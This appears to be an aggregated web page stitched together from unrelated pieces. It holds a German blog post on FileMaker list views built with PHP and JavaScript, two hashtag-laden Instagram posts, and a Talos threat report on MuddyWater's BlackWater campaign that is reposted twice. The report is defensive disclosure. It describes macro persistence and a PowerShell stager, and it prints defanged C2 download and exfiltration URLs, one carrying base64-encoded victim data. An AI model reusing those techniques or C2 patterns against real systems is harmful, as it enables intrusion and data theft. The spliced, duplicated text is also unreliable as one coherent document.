Listenansichten in FileMaker optimieren/ PHP und FileMaker

Listenansichten in FileMaker optimieren Nach einigen Jahren und vielen 1000 Datensätzen die neu ins FileMaker-System gekommen sind, war es soweit. Eine spürbare Verschlechterung der Performance beim Aufbau einer extrem komplexen Listenansicht. Diese Ansicht enthält sehr viele Sortierungen, diverse bedingte Formatierungen zum Ein und Ausblenden von Symbolen, Farbgebung etc. Wenn jetzt noch jemand per VPN auf die Datenbank zugreifen wollte, so konnte es einige Zeit dauern bis die Arbeitsfähigkeit hergestellt war. Dabei wurde die Struktur schon ohne Formeln entwickelt. Die schnellste und effektivste Lösung. Alles wird über ein WebViewer abgewickelt. Betritt der User das Listen-Layout wird ein Serverscript gestartet, sammelt alle FileMaker Daten und überträgt diese dann an ein PHP-Script. Bruchteile später, steht die Liste schon zum arbeiten bereit. Da die Liste nur mit Java-Script arbeitet, sind alle Aktionen sehr schnell. Die Daten werden mithilfe eines FileMaker-Skripts vorbereitet und mit Insert from URL an eine PHP-Datei auf dem Server geschickt. Der Request erfolgt als klassischer application/x-www-form-urlencoded-POST-Aufruf. Der Server nimmt die Daten entgegen, bereinigt sie, zerlegt ggf. Pipe-getrennte Listen, und speichert sie in einem assoziativen Array zur weiteren Verarbeitung.

<?php // Daten säubern function cleanData($value) { return trim($value); } // Pipe-Werte aufspalten (z. B. '4711|4712|4713') function processPipeSeparatedValues($value) { return array_map('trim', explode('|', $value)); } // POST-Verarbeitung starten if ($_SERVER['REQUEST_METHOD'] === 'POST') { $postData = array_map('cleanData', $_POST); // Weiterverarbeitung folgt... } ?>

Auf der FileMaker-Seite wird der Post so aufbereitet Das PHP-Skript erzeugt eine strukturierte HTML-Tabelle, die über CSS und JavaScript erweitert wird. Sticky-Header, Hover-Effekte, Icons, Kartenintegration, alles dabei. Dank JavaScript lassen sich die Einträge mit einem Klick sortieren. Nach PLZ, Straße oder Kategorie. Auch Gruppierungen sind möglich, z. B. nach Stadtvierteln oder Bezirken, die dynamisch über Google Maps Geocoding ermittelt werden.

function sortByPLZ() { const table = document.querySelector("table"); const tbody = table.querySelector("tbody"); const rows = Array.from(tbody.querySelectorAll("tr")); // Entferne alte Gruppenköpfe document.querySelectorAll(".plz-header").forEach(row => row.remove()); // Sortiere Zeilen nach PLZ (Spalte 12, also index 12) rows.sort((a, b) => { const plzA = a.cells[12].textContent.trim(); const plzB = b.cells[12].textContent.trim(); return plzA.localeCompare(plzB, "de", { numeric: true }); }); // Neue Gruppierung einfügen let currentPLZ = ""; rows.forEach(row => { const plz = row.cells[12].textContent.trim(); if (plz !== currentPLZ) { currentPLZ = plz; const headerRow = document.createElement("tr"); headerRow.className = "plz-header"; const headerCell = document.createElement("td"); headerCell.colSpan = row.cells.length; headerCell.textContent = "PLZ: " + plz; headerRow.appendChild(headerCell); tbody.appendChild(headerRow); } tbody.appendChild(row); }); }

In dieser Ansicht wird unter anderem die Entfernung zu den nächsten Standorten ermittelt. Nach erfolgter Sortierung ist es sehr schnell möglich Aufträge zu verketten bei minimierter Fahrzeit. In dieser Ansicht aber nur berechnet über die Haversinsche Formel. Aber es ist ein extrem schneller Anhaltspunkt um Aufträge in Gruppen zusammenzufassen. Besonders charmant: Das ganze geht auch über die Google Maps API. Die Ansicht dann über Google Maps. Über das InfoWindows-Fenster lassen sich unendlich viele Informationen einblenden. In meinem Fall kann aus dieser Perspektive schon die Tourenzusammenstellung erfolgen. Es wird die Arbeitszeit ermittelt und kenntlich gemacht. Eine implementierte Fahrzeiten-Anzeige hat sich für Berliner-Verhältnisse als Unsinnig herausgestellt. Zu viele Verkehrsänderungen, zu viel Stau, in diesem Fall bedarf es der Erfahrung von Mitarbeitern und Disponenten. Wichtig, ist natürlich auch die Sequentielle-Suche. Diese kann natürlich wie schon einmal berichtet, auch in normalen FileMaker-Listen, Anwendung finden. Eine klassische FileMaker angelehnte Suche fehlt natürlich auch nicht. Hier lassen sich verschieden Kriterien verbinden und ermöglichen eine flexible Suche, ähnlich der klassischen FileMaker-Suche. Das ich im Regelfall innerhalb von FileMaker immer Arbeitslayouts nutze, die im Hintergrund bei -30000 Pixel arbeiten, kann ich aus dem WebViewer heraus, alle FileMaker Script nutzen, die im Vorfeld genutzt wurden. Sie bekommen die Parameter in einer etwas anderen Form, meist als Liste. Somit ist der Aufwand auf der FileMaker-Seite überschaubar. Fehlerbehandlung und Fallbacks Natürlich kann nicht immer alles glattlaufen, etwa wenn der Server nicht erreichbar ist oder die Daten aus FileMaker unvollständig übertragen werden. Für diesen Fall habe ich einen einfachen Mechanismus eingebaut. Wenn keine oder fehlerhafte Daten ankommen, zeigt das Skript entweder eine Hinweisbox oder einen minimalen Fallback-Inhalt an. Dabei ist es wichtig, am Anfang der Datei gleich zu prüfen, ob zentrale POST-Werte gesetzt wurden. Gerade bei VPN-Nutzern oder instabilen Mobilverbindungen ist das hilfreich, der Nutzer bekommt sofort Rückmeldung, statt auf eine leere Seite zu starren.

if (!isset($_POST['touren']) || empty($_POST['touren'])) { die("<div class='error'>Keine Daten empfangen. Bitte erneut versuchen.</div>"); }

Unterschied zwischen FileMaker-Client und Server Eine kleine, aber entscheidende Stolperfalle hat mich bei diesem Projekt einige Nerven gekostet. Während der gesamte Aufbau der Liste über den FileMaker Pro Client reibungslos funktionierte, lief das gleiche Script nicht mehr, wenn es über ein Server-Script (FileMaker Server) angestoßen wurde. Die WebViewer-Seite blieb leer. Kein Fehler, kein Hinweis, einfach nichts. Nach längerer Analyse stellte sich heraus, die Anzahl und Verschachtelungen der DOM-Elemente war der Grund. Im Client lief das Rendering noch sauber durch, aber der FileMaker Server scheint bei der Generierung und Übergabe des WebViewers, speziell in Kombination mit „Insert from URL“ -> WebViewer -> HTML-Rendering, empfindlicher zu reagieren. Besonders bei vielen verschachtelten div-Containern, Tabellen-Inlays und Icon-Ebenen war Schluss. Die Lösung war eher pragmatisch als elegant, ich habe den DOM deutlich verschlankt, viele dekorative Elemente entfernt oder durch schlankere Varianten ersetzt. Statt

mit drei Ebenen für Rahmen, Schatten und Hover, verwende ich jetzt.

<tr class="hover"> <td>4711</td> <td>Berlin</td> <td>…</td> </tr>

Und auch bei Zusatzinfos im InfoWindow der Google Maps Ansicht wurde auf alles Überflüssige verzichtet. Das Resultat, die Darstellung läuft jetzt reibungslos auch bei serverseitiger Übergabe, ohne dass der WebViewer hängen bleibt oder gar leer bleibt. Was bleibt nach dieser Umstellung? Ganz klar, die WebViewer-Lösung ist ein echter Gamechanger für große, komplexe Listenansichten in FileMaker. Die Performance ist kaum vergleichbar mit der klassischen Layoutdarstellung, besonders dann, wenn Sortierungen, Gruppierungen und visuelle Hilfsmittel wie Karten gebraucht werden. Eine HTML-Tabelle mit JavaScript schlägt hier jedes FileMaker-Layout um Längen.

(via earth) .

Working on backend web-services (using #php not #nodejs this time) for an #app...coz some APIs are working better with PHP on this requirements to compelling with java and A.S ide.Then, there will be some JS implementation necessary for the navigation points after. Yes, #themandalorian - for little bit relaxation (perk of WFH🙂) ---- __ #androiddeveloper #100daysofcode #codinglife #301daysofcode #phpdeveloper #backenddeveloper #backenddevelopment #serverscript #webservices #appdevelopment #appdesign #mobileappdevelopment #crossplatformappdevelopment #Coding #nodejsdeveloper #javadeveloper #java #macbook for #programming #programmer #coder #jsdev #javascriptdeveloper #javascript #js #codingdays (at App Developer) https://www.instagram.com/p/B-kNwRFFQVa/?igshid=fyotnb4tgijw

Original Post from Talos Security Author:

This blog was authored by Danny Adamitis, David Maynor, and Kendall McKay

Executive summary

Cisco Talos assesses with moderate confidence that a campaign we recently discovered called “BlackWater” is associated with suspected persistent threat actor MuddyWater. Newly associated samples from April 2019 indicate attackers have added three distinct steps to their operations, allowing them to bypass certain security controls and suggesting that MuddyWater’s tactics, techniques and procedures (TTPs) have evolved to evade detection. If successful, this campaign would install a PowerShell-based backdoor onto the victim’s machine, giving the threat actors remote access. While this activity indicates the threat actor is taking steps to improve its operational security and avoid endpoint detection, the underlying code remains unchanged. The findings outlined in this blog should help threat hunting teams identify MuddyWater’s latest TTPs.

In this latest activity, the threat actor first added an obfuscated Visual Basic for Applications (VBA) script to establish persistence as a registry key. Next, the script triggered a PowerShell stager, likely in an attempt to masquerade as a red-teaming tool rather than an advanced actor. The stager would then communicate with one actor-controlled server to obtain a component of the FruityC2 agent script, an open-source framework on GitHub, to further enumerate the host machine. This could allow the threat actor to monitor web logs and determine whether someone uninvolved in the campaign made a request to their server in an attempt to investigate the activity. Once the enumeration commands would run, the agent would communicate with a different C2 and send back the data in the URL field. This would make host-based detection more difficult, as an easily identifiable “errors.txt” file would not be generated. The threat actors also took additional steps to replace some variable strings in the more recent samples, likely in an attempt to avoid signature-based detection from Yara rules.

This activity shows an increased level of sophistication from related samples observed months prior. Between February and March 2019, probable MuddyWater-associated samples indicated that the threat actors established persistence on the compromised host, used PowerShell commands to enumerate the victim’s machine and contained the IP address of the actor’s command and control (C2). All of these components were included in the trojanized attachment, and therefore a security researcher could uncover the attackers’ TTPs simply by obtaining a copy of the document. By contrast, the activity from April would require a multi-step investigative approach.

BlackWater document

Talos has uncovered documents that we assess with moderate confidence are associated with suspected persistent threat actor MuddyWater. MuddyWater has been active since at least November 2017 and has been known to primarily target entities in the Middle East. We assess with moderate confidence that these documents were sent to victims via phishing emails. One such trojanized document was created on April 23, 2019. The original document was titled “company information list.doc”.

Once the document was opened, it prompted the user to enable the macro titled “BlackWater.bas”. The threat actor password-protected the macro, making it inaccessible if a user attempted to view the macro in Visual Basic, likely as an anti-reversing technique. The “Blackwater.bas” macro was obfuscated using a substitution cipher whereby the characters are replaced with their corresponding integer.

Image of the macro

The macro contains a PowerShell script to persist in the “Run” registry key, “KCUSoftwareMicrosoftWindowsCurrentVersionRunSystemTextEncoding”. The script then called the file “ProgramDataSysTextEnc.ini” every 300 seconds. The clear text version of the SysTextEnc.ini appears to be a lightweight stager.

Screenshot of the stager found in the document

The stager then reached out to the actor-controlled C2 server located at hxxp://38[.]132[.]99[.]167/crf.txt. The clear text version of the crf.txt file closely resembled the PowerShell agent that was previously used by the MuddyWater actors when they targeted Kurdish political groups and organizations in Turkey. The screenshot below shows the first few lines of the PowerShell trojan. The actors have made some small changes, such as altering the variable names to avoid Yara detection and sending the results of the commands to the C2 in the URL instead of writing them to file. However, despite these changes, the functionality remains almost unchanged. Notably, a number of the PowerShell commands used to enumerate the host appear to be derived from a GitHub projected called FruityC2.

Image of the PowerShell script embedded in the document used to target Kurdish officials

Image of the PowerShell script from the threat actor-controlled server

This series of commands first sent a server hello message to the C2, followed by a subsequent hello message every 300 seconds. An example of this beacon is “hxxp://82[.]102[.]8[.]101:80/bcerrxy.php?rCecms=BlackWater”. Notably, the trojanized document’s macro was also called “BlackWater,” and the value “BlackWater” was hard coded into the PowerShell script.

Next, the script would enumerate the victim’s machine. Most of the PowerShell commands would call Windows Management Instrumentation (WMI) and then query the following information:

Operating system’s name (i.e., the name of the machine)

Operating system’s OS architecture

Operating system’s caption

Computer system’s domain

Computer system’s username

Computer’s public IP address

The only command that did not call WMI was for the “System.Security.Cryptography.MD5CryptoServiceProvider.ComputerHash”, or the command to obtain the security system’s MD5 hash. This was likely pulled to uniquely identify the workstation in case multiple workstations were compromised within the same network. Once the host-based enumeration information was obtained, it was base64-encoded and then appended to the URL post request to a C2, whereas in previous versions this information was written to a text file. A copy of the encoded command is shown below:

hxxp://82[.]102[.]8[.]101/bcerrxy.php?riHl=RkYtRkYtRkYtRkYtRkYtRkYtRkYtRkYtRkYtRkYtRkYtRkYtRkYtRkYtRkYtRkYqMTk5NypFUDEq0D0uTWljcm9zb2Z0IFdpbmRvd3MgNyBQcm9mZXNzaW9uYWwqMzItYml0KlVTRVItUEMqV09SS0dST1VQ0D0uKlVTRVItUENcYWRtaW4qMTkyLjE2OC4wMDAuMDE=

Once decoded, the output of the above command became clear:

hxxp://82[.]102[.]8[.]101/bcerrxy.php?riHi=FF-FF-FF-FF-FF-FF-FF-FF-FF-FF-FF-FF-FF-FF-FF-FF*1997*EP1*Ð=.Microsoft Windows 7 Professional*32-bit*USER-PC*WORKGROUPÐ=.*USER-PCadmin*192.168.000.01

Conclusion

In addition to the new anti-detection steps outlined in this report, the MuddyWater actors have made small modifications to avoid common host-based signatures and replaced variable names to avoid Yara signatures. These changes were superficial, as their underlying code base and implant functionality remained largely unchanged. However, while these changes were minimal, they were significant enough to avoid some detection mechanisms. Despite last month’s report on aspects of the MuddyWater campaign, the group is undeterred and continues to perform operations. Based on these observations, as well as MuddyWater’s history of targeting Turkey-based entities, we assess with moderate confidence that this campaign is associated with the MuddyWater threat actor group.

Indicators of compromise

Hashes

0f3cabc7f1e69d4a09856cc0135f7945850c1eb6aeecd010f788b3b8b4d91cad 9d998502c3999c4715c880882efa409c39dd6f7e4d8725c2763a30fbb55414b7 0d3e0c26f7f53dff444a37758b414720286f92da55e33ca0e69edc3c7f040ce2 A3bb6b3872dd7f0812231a480881d4d818d2dea7d2c8baed858b20cb318da981 6f882cc0cddd03bc123c8544c4b1c8b9267f4143936964a128aa63762e582aad Bef9051bb6e85d94c4cfc4e03359b31584be027e87758483e3b1e65d389483e6 B2600ac9b83e5bb5f3d128dbb337ab1efcdc6ce404adb6678b062e95dbf10c93 4dd641df0f47cb7655032113343d53c0e7180d42e3549d08eb7cb83296b22f60 576d1d98d8669df624219d28abcbb2be0080272fa57bf7a637e2a9a669e37acf 062a8728e7fcf2ff453efc56da60631c738d9cd6853d8701818f18a4e77f8717

URLs

hxxp://38[.]132[.]99[.]167/crf.txt hxxp://82[.]102[.]8[.]101:80/bcerrxy.php?rCecms=BlackWater hxxp://82[.]102[.]8[.]101/bcerrxy.php? hxxp://94[.]23[.]148[.]194/serverScript/clientFrontLine/helloServer.php hxxp://94[.]23[.]148[.]194/serverScript/clientFrontLine/getCommand.php hxxp://94[.]23[.]148[.]194/serverScript/clientFrontLine/ hxxp://136[.]243[.]87[.]112:3000/KLs6yUG5Df hxxp://136[.]243[.]87[.]112:3000/ll5JH6f4Bh hxxp://136[.]243[.]87[.]112:3000/Y3zP6ns7kG

Coverage

Doc.Dropper.Pwshell::malicious.tht.talos

#gallery-0-5 { margin: auto; } #gallery-0-5 .gallery-item { float: left; margin-top: 10px; text-align: center; width: 33%; } #gallery-0-5 img { border: 2px solid #cfcfcf; } #gallery-0-5 .gallery-caption { margin-left: 0; } /* see gallery_shortcode() in wp-includes/media.php */

Go to Source Author: Recent MuddyWater-associated BlackWater campaign shows signs of new anti-detection techniques Original Post from Talos Security Author: This blog was authored by Danny Adamitis, David Maynor…

User Access To An #API using JWT I will create a new API with two routes. The first route will be public, while the second one will require the user to be authenticated using #JWT into order to access it. Start code api.js- ---- #androiddeveloper #100daysofcode #codinglife #301daysofcode #phpdeveloper #backenddeveloper #backenddevelopment #serverscript #webservices #appdevelopment #appdesign #mobileappdevelopment #crossplatformappdevelopment #Coding #nodejsdeveloper #javadeveloper #java #macbook for #programming #programmer #coder #jsdev #javascript #js #codingdays #jsdeveloper #javascriptdeveloper #Codinglife #androidappdeveloper (at App Developer) https://www.instagram.com/p/B-oKvhFF7hZ/?igshid=1sbg61scub6x5

Original Post from Talos Security Author:

This blog was authored by Danny Adamitis, David Maynor, and Kendall McKay

Executive summary

Cisco Talos assesses with moderate confidence that a campaign we recently discovered called “BlackWater” is associated with suspected persistent threat actor MuddyWater. Newly associated samples from April 2019 indicate attackers have added three distinct steps to their operations, allowing them to bypass certain security controls and suggesting that MuddyWater’s tactics, techniques and procedures (TTPs) have evolved to evade detection. If successful, this campaign would install a PowerShell-based backdoor onto the victim’s machine, giving the threat actors remote access. While this activity indicates the threat actor is taking steps to improve its operational security and avoid endpoint detection, the underlying code remains unchanged. The findings outlined in this blog should help threat hunting teams identify MuddyWater’s latest TTPs.

In this latest activity, the threat actor first added an obfuscated Visual Basic for Applications (VBA) script to establish persistence as a registry key. Next, the script triggered a PowerShell stager, likely in an attempt to masquerade as a red-teaming tool rather than an advanced actor. The stager would then communicate with one actor-controlled server to obtain a component of the FruityC2 agent script, an open-source framework on GitHub, to further enumerate the host machine. This could allow the threat actor to monitor web logs and determine whether someone uninvolved in the campaign made a request to their server in an attempt to investigate the activity. Once the enumeration commands would run, the agent would communicate with a different C2 and send back the data in the URL field. This would make host-based detection more difficult, as an easily identifiable “errors.txt” file would not be generated. The threat actors also took additional steps to replace some variable strings in the more recent samples, likely in an attempt to avoid signature-based detection from Yara rules.

This activity shows an increased level of sophistication from related samples observed months prior. Between February and March 2019, probable MuddyWater-associated samples indicated that the threat actors established persistence on the compromised host, used PowerShell commands to enumerate the victim’s machine and contained the IP address of the actor’s command and control (C2). All of these components were included in the trojanized attachment, and therefore a security researcher could uncover the attackers’ TTPs simply by obtaining a copy of the document. By contrast, the activity from April would require a multi-step investigative approach.

BlackWater document

Talos has uncovered documents that we assess with moderate confidence are associated with suspected persistent threat actor MuddyWater. MuddyWater has been active since at least November 2017 and has been known to primarily target entities in the Middle East. We assess with moderate confidence that these documents were sent to victims via phishing emails. One such trojanized document was created on April 23, 2019. The original document was titled “company information list.doc”.

Once the document was opened, it prompted the user to enable the macro titled “BlackWater.bas”. The threat actor password-protected the macro, making it inaccessible if a user attempted to view the macro in Visual Basic, likely as an anti-reversing technique. The “Blackwater.bas” macro was obfuscated using a substitution cipher whereby the characters are replaced with their corresponding integer.

Image of the macro

The macro contains a PowerShell script to persist in the “Run” registry key, “KCUSoftwareMicrosoftWindowsCurrentVersionRunSystemTextEncoding”. The script then called the file “ProgramDataSysTextEnc.ini” every 300 seconds. The clear text version of the SysTextEnc.ini appears to be a lightweight stager.

Screenshot of the stager found in the document

The stager then reached out to the actor-controlled C2 server located at hxxp://38[.]132[.]99[.]167/crf.txt. The clear text version of the crf.txt file closely resembled the PowerShell agent that was previously used by the MuddyWater actors when they targeted Kurdish political groups and organizations in Turkey. The screenshot below shows the first few lines of the PowerShell trojan. The actors have made some small changes, such as altering the variable names to avoid Yara detection and sending the results of the commands to the C2 in the URL instead of writing them to file. However, despite these changes, the functionality remains almost unchanged. Notably, a number of the PowerShell commands used to enumerate the host appear to be derived from a GitHub projected called FruityC2.

Image of the PowerShell script embedded in the document used to target Kurdish officials

Image of the PowerShell script from the threat actor-controlled server

This series of commands first sent a server hello message to the C2, followed by a subsequent hello message every 300 seconds. An example of this beacon is “hxxp://82[.]102[.]8[.]101:80/bcerrxy.php?rCecms=BlackWater”. Notably, the trojanized document’s macro was also called “BlackWater,” and the value “BlackWater” was hard coded into the PowerShell script.

Next, the script would enumerate the victim’s machine. Most of the PowerShell commands would call Windows Management Instrumentation (WMI) and then query the following information:

Operating system’s name (i.e., the name of the machine)

Operating system’s OS architecture

Operating system’s caption

Computer system’s domain

Computer system’s username

Computer’s public IP address

The only command that did not call WMI was for the “System.Security.Cryptography.MD5CryptoServiceProvider.ComputerHash”, or the command to obtain the security system’s MD5 hash. This was likely pulled to uniquely identify the workstation in case multiple workstations were compromised within the same network. Once the host-based enumeration information was obtained, it was base64-encoded and then appended to the URL post request to a C2, whereas in previous versions this information was written to a text file. A copy of the encoded command is shown below:

hxxp://82[.]102[.]8[.]101/bcerrxy.php?riHl=RkYtRkYtRkYtRkYtRkYtRkYtRkYtRkYtRkYtRkYtRkYtRkYtRkYtRkYtRkYtRkYqMTk5NypFUDEq0D0uTWljcm9zb2Z0IFdpbmRvd3MgNyBQcm9mZXNzaW9uYWwqMzItYml0KlVTRVItUEMqV09SS0dST1VQ0D0uKlVTRVItUENcYWRtaW4qMTkyLjE2OC4wMDAuMDE=

Once decoded, the output of the above command became clear:

hxxp://82[.]102[.]8[.]101/bcerrxy.php?riHi=FF-FF-FF-FF-FF-FF-FF-FF-FF-FF-FF-FF-FF-FF-FF-FF*1997*EP1*Ð=.Microsoft Windows 7 Professional*32-bit*USER-PC*WORKGROUPÐ=.*USER-PCadmin*192.168.000.01

Conclusion

In addition to the new anti-detection steps outlined in this report, the MuddyWater actors have made small modifications to avoid common host-based signatures and replaced variable names to avoid Yara signatures. These changes were superficial, as their underlying code base and implant functionality remained largely unchanged. However, while these changes were minimal, they were significant enough to avoid some detection mechanisms. Despite last month’s report on aspects of the MuddyWater campaign, the group is undeterred and continues to perform operations. Based on these observations, as well as MuddyWater’s history of targeting Turkey-based entities, we assess with moderate confidence that this campaign is associated with the MuddyWater threat actor group.

Indicators of compromise

Hashes

0f3cabc7f1e69d4a09856cc0135f7945850c1eb6aeecd010f788b3b8b4d91cad 9d998502c3999c4715c880882efa409c39dd6f7e4d8725c2763a30fbb55414b7 0d3e0c26f7f53dff444a37758b414720286f92da55e33ca0e69edc3c7f040ce2 A3bb6b3872dd7f0812231a480881d4d818d2dea7d2c8baed858b20cb318da981 6f882cc0cddd03bc123c8544c4b1c8b9267f4143936964a128aa63762e582aad Bef9051bb6e85d94c4cfc4e03359b31584be027e87758483e3b1e65d389483e6 B2600ac9b83e5bb5f3d128dbb337ab1efcdc6ce404adb6678b062e95dbf10c93 4dd641df0f47cb7655032113343d53c0e7180d42e3549d08eb7cb83296b22f60 576d1d98d8669df624219d28abcbb2be0080272fa57bf7a637e2a9a669e37acf 062a8728e7fcf2ff453efc56da60631c738d9cd6853d8701818f18a4e77f8717

URLs

hxxp://38[.]132[.]99[.]167/crf.txt hxxp://82[.]102[.]8[.]101:80/bcerrxy.php?rCecms=BlackWater hxxp://82[.]102[.]8[.]101/bcerrxy.php? hxxp://94[.]23[.]148[.]194/serverScript/clientFrontLine/helloServer.php hxxp://94[.]23[.]148[.]194/serverScript/clientFrontLine/getCommand.php hxxp://94[.]23[.]148[.]194/serverScript/clientFrontLine/ hxxp://136[.]243[.]87[.]112:3000/KLs6yUG5Df hxxp://136[.]243[.]87[.]112:3000/ll5JH6f4Bh hxxp://136[.]243[.]87[.]112:3000/Y3zP6ns7kG

Coverage

Doc.Dropper.Pwshell::malicious.tht.talos

#gallery-0-5 { margin: auto; } #gallery-0-5 .gallery-item { float: left; margin-top: 10px; text-align: center; width: 33%; } #gallery-0-5 img { border: 2px solid #cfcfcf; } #gallery-0-5 .gallery-caption { margin-left: 0; } /* see gallery_shortcode() in wp-includes/media.php */

Go to Source Author: Recent MuddyWater-associated BlackWater Campaign Shows Signs of New Anti-detection Techniques Original Post from Talos Security Author: This blog was authored by Danny Adamitis, David Maynor…